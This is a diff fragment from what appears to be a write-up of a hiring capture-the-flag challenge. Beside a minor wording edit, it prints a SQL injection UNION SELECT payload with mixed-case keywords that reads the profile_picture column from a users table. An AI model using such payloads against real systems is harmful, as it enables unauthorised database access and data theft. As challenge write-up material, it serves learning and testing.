Aftab700/Writeups/Saptang_Labs_Hiring_Challenge.md

 **Record updated successfullyThe file has been uploaded** and file is uploaded successfully but where ?

-we have column name profile_picture in users table if you remember let's see that we still have SQLi.
+we have column name profile_picture in users table, if you remember that we still have SQLi.

 payload=`data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,profile_picture,0x7c), 2, 3 fRoM users<@/base64>`